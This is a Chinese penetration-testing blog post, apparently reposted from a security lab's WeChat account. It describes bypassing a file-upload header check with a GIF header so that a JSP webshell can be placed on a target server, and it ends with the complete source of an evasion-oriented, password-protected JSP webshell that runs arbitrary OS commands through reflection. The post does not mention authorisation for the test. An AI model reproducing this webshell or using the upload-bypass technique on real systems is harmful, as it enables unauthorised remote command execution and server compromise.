渗透实战|JSP上传webshell报错500

admin 2022年4月23日00:02:32评论130 views字数 1309阅读4分21秒阅读模式
前言


这篇文章主要是一个渗透思路问题

0x01

懒得打字了,上传的地方就大约是这个情况 ,看聊天聊天记录吧,大概就是可以上传webshell,但是报错


渗透实战|JSP上传webshell报错500



渗透实战|JSP上传webshell报错500


下班后回家做了一顿饭,亲自下厨,因为是刚搬过来,没有锅盖,直接起锅烧油,洗菜盆子一盖


渗透实战|JSP上传webshell报错500

味道可以,给我自己厨艺打个满分

渗透实战|JSP上传webshell报错500



0x02 开搞

吃完饭后我就打开电脑测试了一下,确实是检测文件头


渗透实战|JSP上传webshell报错500



没有文件头就直接200.返回包什么东西都没有,带文件头即可成功上传,并且返回上传路径


渗透实战|JSP上传webshell报错500


访问webshell 500,这里的500并不是冰蝎马那种500,因为我上传的是123456,本身并不应该报错


渗透实战|JSP上传webshell报错500


然后我换了一下JSPX 还是报错,提示空指针,不是马的问题


渗透实战|JSP上传webshell报错500


后来回看jsp的报错信息,仔细看发现报错原因居然是因为我们的图片马的文件头


渗透实战|JSP上传webshell报错500


具体是因为我们的png文件头不是UTF-8编码,但是删掉文件头又上传不上去


渗透实战|JSP上传webshell报错500


一直在寻找躲避这个错误的方法,后来一想,gif的文件头可以是纯UTF-8编码的,测试一下传了个马正常上传


渗透实战|JSP上传webshell报错500


访问一下webshell看看还报错吗,无情,直接给我来了一句网络安全为人民,网络安全靠人民


渗透实战|JSP上传webshell报错500


转战免杀马测试,成功上传且执行命令

渗透实战|JSP上传webshell报错500


最后分享一下免杀的cmd马
<%@ page language="java" pageEncoding="UTF-8" %><%// 加入一个密码String PASSWORD = "password";String passwd = request.getParameter("pwd");String cmd = request.getParameter("cmd");if (!passwd.equals(PASSWORD)) {return;}// 反射调用Class rt = Class.forName("java.lang.Runtime");java.lang.reflect.Method gr = rt.getMethod("getRuntime");java.lang.reflect.Method ex = rt.getMethod("exec", String.class);Process process = (Process) ex.invoke(gr.invoke(null), cmd);// 类似上文做回显java.io.InputStream in = process.getInputStream();out.print("<pre>");java.io.InputStreamReader resultReader = new java.io.InputStreamReader(in);java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);String s = null;while ((s = stdInput.readLine()) != null) {out.println(s);}out.print("</pre>");%>

还是那句话,代码是人写的,规则也是人配置的,渗透最重要的就是思路,好的思路会让你成长的更快。




渗透实战|JSP上传webshell报错500


乌特拉安全实验室
UTRA-Sec


原文始发于微信公众号(乌特拉安全实验室):渗透实战|JSP上传webshell报错500

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月23日00:02:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透实战|JSP上传webshell报错500http://cn-sec.com/archives/931193.html

发表评论

匿名网友 填写信息